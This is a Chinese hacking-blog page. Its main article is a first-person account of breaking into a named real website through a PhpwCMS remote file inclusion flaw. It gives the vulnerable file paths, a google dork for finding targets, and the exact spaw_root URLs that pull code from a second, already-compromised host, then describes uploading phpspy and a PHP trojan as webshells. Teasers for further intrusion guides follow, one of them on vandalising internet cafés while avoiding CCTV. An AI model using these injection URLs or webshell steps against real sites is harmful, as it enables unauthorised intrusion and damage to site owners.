学习利用文件包含漏洞进行网站入侵
所属分类:
网络安全 / 黑客入侵
阅读数:
103
收藏 0赞 0分享
一、看见漏洞公告
最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
文件中的$spaw_root的没有过滤的情况下,包含’**class/lang.class.php’。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。
二、学习的第一天
马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。
检测出有文件包含漏洞
现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。
三、学习的第二天
去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。
在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。
php环境信息
编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。
包含的国外php木马
但是这个国外的php马还是上传一个经过修改的phpspy吧,用着舒服一点,上传得文件改为了imge.php,现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陆后一台webshell就在我们的眼前了。权限也不错,但是由于是linux系统,也不知道怎么去提权,还是再放一下吧!
phpspy上传成功
四、学习的第三天
对linux下的提权一点都不了解,没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看,他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因:因为我的系统是2003的,所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。
看来这次的学习也蛮有意义的!发现一点,国外的网站的管理人员比较重视安全。在出现漏洞的第二天,很多网站都把漏洞补了,还有的网站被入侵后能马上发现,并及时清除了webshell。
黑客技术讲解 网吧入侵方法大搜罗
首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体
收藏 0赞 0分享
通过Asp入侵Webserver
通过asp入侵web server,窃取文件毁坏系统,这决非耸人听闻...
iis的安全性问题
1.iis3/pws的漏洞
我实验过,win98 pws上运行ASP程序,只须在浏览器地址栏内多加一个小数点ASP程序就会被下载下来。IIS3听说也有同样的问题,
收藏 0赞 0分享
详尽的IPC$入侵
一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步
收藏 0赞 0分享
如何入侵ADSL
这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范!
口述:
也许看烂了网上已有的
收藏 0赞 0分享
看我来入侵复旦大学(图)
一、师出有名
某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。
二、战略部署
这次要拿的
收藏 0赞 0分享
领土之争——入侵某视讯服务器回忆录
老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。
1.石榴裙下的kk
说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终
收藏 0赞 0分享
黑客攻防实战之对有防火墙网站入侵过程
前几天群里的兄弟给了一个网站,问我可不可以入侵。
一、踩点
ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp
收藏 0赞 0分享
看看黑客都在偷窥什么!入侵个人电脑揭密(图)
前几天看《南国早报》说一位女孩个人电脑被黑客入侵控制,把裸照发到网上威胁女孩的事。联想到最近网上这样的事挺多的,就想给大家说说怎么防范。
其实现在的网络真的不安全~只要你的电脑连接上网络就存在一定的风险。黑客并不是万能的,他们入侵的电脑都是存在比较严重
收藏 0赞 0分享
XSS Phishing - 新式跨站脚本攻击方式(图)
最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞!
跨站脚本攻击最大的魅力是通过HTML注
收藏 0赞 0分享
PHP数据库安全之SQL注入
$offset = $argv[0]; // 注意,没有输入验证!
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
$resu
收藏 0赞 0分享
查看更多